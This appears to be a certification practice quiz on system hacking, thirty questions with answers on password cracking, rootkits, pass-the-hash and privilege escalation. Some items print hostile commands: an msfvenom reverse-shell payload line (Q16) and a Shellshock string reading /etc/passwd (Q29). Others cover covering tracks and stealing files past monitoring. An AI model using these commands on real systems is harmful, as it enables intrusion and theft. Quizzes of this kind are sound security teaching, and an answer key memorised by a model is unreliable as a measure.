Module 6 - System Hacking

Question 1

How does an operating system protect the passwords used for account logins?

A) The operating system performs a one-way hash of the passwords.
B) The operating system encrypts the passwords, and decrypts them when needed.
C) The operating system stores all passwords in a protected segment of nonvolatile memory.
D) The operating system stores the passwords in a secret file that users cannot find.

Answer 1

A

Question 2

Which of these cracks passwords by utilizing a pre-computed table of password hashes?

A) Dictionary attack
B) Brute Force attack
C) Hybrid attack
D) Rainbow Table attack

Answer 2

D

Question 3

Which of these is a technique to use DNS to sneak data or malware past your corporate firewall, which could then be used for communication from a victim’s machine to a C&C server?

A) DNS tunneling method
B) DNS cache snooping
C) DNSSEC zone walking
D) DNS enumeration

Answer 3

A

Question 4

Consider this output from a hacker’s machine targeting another machine with the IP address of 192.168.3.10:

[ATTEMPT] target 192.168.3.10 – login “root” – pass “a” 1 of 20
[ATTEMPT] target 192.168.3.10 – login “root” – pass “123” 2 of 20
[ATTEMPT] target 192.168.3.10 – login “admin” – pass “a” 3 of 20
[ATTEMPT] target 192.168.3.10 – login “admin” – pass “123” 4 of 20
[ATTEMPT] target 192.168.3.10 – login “guest” – pass “a” 5 of 20
[ATTEMPT] target 192.168.3.10 – login “guest” – pass “123” 6 of 20
[ATTEMPT] target 192.168.3.10 – login “” – pass “a” 7 of 20
[ATTEMPT] target 192.168.3.10 – login “” – pass “123” 8 of 20

Which is most likely taking place here?

A) Ping sweep of the 192.168.3.10 network
B) Remote service brute force attempt
C) Port scan of 192.168.3.10
D) Denial of service attack on 192.168.3.10

Answer 4

B

Question 5

To attack her hapless victim, Hacker Heather had to have a terminal window open to perform her hacking. While typing at the command-line, she had to enter several of her own passwords in plaintext in order to access some of her tools. When she was done doing her dirty deeds, which file should she clean in order to clear her passwords?

A) .xsession-log
B) .bashrc
C) .bash_history
D) .profile

Answer 5

C

Question 6

Which type of rootkit sits undetected in the core of an operating system?

A) Firmware rootkit
B) Kernel rootkit
C) Hardware rootkit
D) Hypervisor rootkit

Answer 6

B

Question 7

Which password cracking technique takes the longest time and most effort?

A) Dictionary attack
B) Shoulder surfing
C) Brute force
D) Rainbow tables

Answer 7

C

Question 8

Which type of password cracking technique would feed a list of common passwords into a cracking application in an attempt to gain access to a user’s account?

A) Known plaintext
B) Brute force
C) Password spraying
D) Dictionary

Answer 8

D

Question 9

On a Linux system you can hide files by starting the file’s name with which of these characters?

A) Tilde (~)
B) Period (.)
C) Underscore (_)
D) Exclamation mark (!)

Answer 9

B

Question 10

Which technique provides ‘security through obscurity‘ by hiding secret messages within ordinary messages?

A) Encryption
B) RSA algorithm
C) Steganography
D) Public-Key cryptography

Answer 10

C

Question 11

Which of these programming languages is commonly vulnerable to buffer overflows?

A) C#
B) C++
C) Python
D) Java

Answer 11

B

Question 12

You breached a system and got the password hashes. You need to use these passwords to log on to systems, but you don’t have time to crack the hashes to find the passwords. Which type of attack could you use instead?

A) Pass the hash
B) Pass the ticket
C) LLMNR/NBT-NS poisoning
D) Internal monologue attack

Answer 12

A

Note: If you get someone’s hash, you don’t even need to crack it to log-on to a Windows network. You can just transmit (pass) the hash to the server you want to log-on to. Metasploit (and other tools) has a pass-the-hash module for doing this. Defenses for this include 1) not letting an attacker get your hashes in the first place, 2) Multi-factor authentication, 3) Network segmentation, etc.

Question 13

If you boot a Windows machine with an Ubuntu Live CD, which Linux command-line tool can change user passwords and activate disabled accounts in the SAM file of the Windows machine?

A) SET
B) CHNTPW
C) Cain & Abel
D) John the Ripper

Answer 13

B

Question 14

After gaining control to a user account, how can you gain access to another user account’s confidential files and data?

A) Port scanning
B) Hacking Active Directory
C) Shoulder-surfing
D) Privilege Escalation

Answer 14

D

Note: Once you gain access to a user account, a successful privilege escalation attack could allow you to gain the rights of another user or admin.

Question 15

As an admin, how can you protect your password files against rainbow tables?

A) Password salting
B) Use of non-dictionary words
C) All uppercase character passwords
D) Lockout accounts under brute force password cracking attempts

Answer 15

A

Question 16

Which of these is the correct syntax to use MSFvenom to create a reverse TCP shellcode exploit for Windows?

A) msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.5.10 LPORT=3456 -f exe>shell.exe
B) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.10 LPORT=3456 -f exe>shell.exe
C) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.10 LPORT=3456 -f c
D) msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.5.10 LPORT=3456 -f c

Answer 16

B

Question 17

After gaining access to a list of logins and hashed passwords, which of these would be the fastest way to crack the passwords?

A) Collision
B) Rainbow tables
C) Decryption
D) Brute force

Answer 17

B

Question 18

Which option below is the best choice to protect against privilege escalation?

A) Patch systems regularly and upgrade interactive login privileges to the system administrator level.
B) Run administrator and applications on least privileges and use a content registry for tracking.
C) Run services with least privileged accounts and implement multi-factor authentication and authorization.
D) Review user roles and administrator privileges for maximum utilization of automation services.

Answer 18

C

Question 19

Your web-page asks users to enter their mailing address, but you’re worried about possible buffer overflow attacks. Which bit of pseudo-code would correctly limit the Address1 field to 40 characters and avoid a buffer overflow?

A) if (Address1 = 40) {update field} else exit
B) if (Address1 != 40) {update field} else exit
C) if (Address1 >= 40) {update field} else exit
D) if (Address1 <= 40) {update field} else exit

Answer 19

D

Question 20

Which of these is an exploitation framework that can automate attacks on unpatched systems?

A) Nessus
B) Wireshark
C) Maltego
D) Metasploit

Answer 20

D

Question 21

Which type of password attack pulls passwords from a list of commonly used passwords until the correct password is found or the list is exhausted?

A) Man-in-the-middle attack
B) Brute-force attack
C) Dictionary attack
D) Session hijacking

Answer 21

C

Question 22

Which of these tools would NOT be used for cracking password hashes?

A) Netcat
B) John the Ripper
C) TCH-Hydra
D) Hashcat

Answer 22

A
Note: Netcat is a tool for reading from and writing to TCP and UDP network connections. It has nothing to do with cracking passwords, however the other 3 listed tools do.

Question 23

You want to steal a file from work and send it to your home computer. If your company monitors outbound traffic, how can you transfer the file without raising any suspicion?

A) Encrypt the Sales.xls using PGP and e-mail it to your personal gmail account.
B) Package the Sales.xls using Trojan wrappers and telnet them back your home computer.
C) You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques.
D) Change the extension of Sales.xls to sales.txt and upload them as attachment to your hotmail account.

Answer 23

C

Question 24

Which OS did the Shellshock vulnerability NOT directly affect?

A) Windows
B) Linux
C) OS X
D) Unix

Answer 24

A

Question 25

Which bit of pseudo-code in a programming module would limit input to less than 300 characters, and if there are 300 characters, the module should stop because it can’t hold any more data?

A) If (I > 300) then exit
B) If (I < 300) then exit
C) If (I <= 300) then exit
D) If (I >= 300) then exit

Answer 25

D

Question 26

Which of these can be probed for weakness with John the Ripper?

A) Firewall rulesets
B) Usernames
C) Passwords
D) File permissions

Answer 26

C

Question 27

Before you turn on auditing on a production server, what should you do first?

A) Perform a vulnerability scan of the system.
B) Determine the impact of enabling the audit feature.
C) Perform a cost/benefit analysis of the audit feature.
D) Allocate funds for staffing of audit log review.

Answer 27

B

Question 28

Which of these Metasploit post-exploitation modules can be used to escalate privileges on a Windows server?

A) getsystem
B) keylogrecorder
C) getuid
D) autoroute

Answer 28

A

Note: After exploiting a vulnerability on a Windows system and getting a Meterpreter command prompt back from the victim, the getsystem command will automatically perform several privilege escalation attacks to get “system” privileges, which is basically administrator-level privileges.

The getuid command shows the currently logged-in user’s ID. The autoroute command will allow you to pivot through the victim’s machine to attack yet other machines. There is no keylogrecorder command.

Question 29

env x=(){ :;};echo exploit bash -c ‘cat /etc/passwd’What is the Shellshock bash vulnerability attempting to do on an vulnerable Linux host?

A) Changes all passwords in passwd
B) Display passwd content to prompt
C) Removes the passwd file
D) Add new user to the passwd file

Answer 29

B

Question 30

Which of these would be considered “clearing tracks”?

A) An attacker gains access to a server through an exploitable vulnerability.
B) After a system is breached, a hacker creates a backdoor to allow re-entry into a system.
C) During a cyberattack, a hacker injects a rootkit into a server.
D) During a cyberattack, a hacker corrupts the event logs on all machines.

Answer 30

D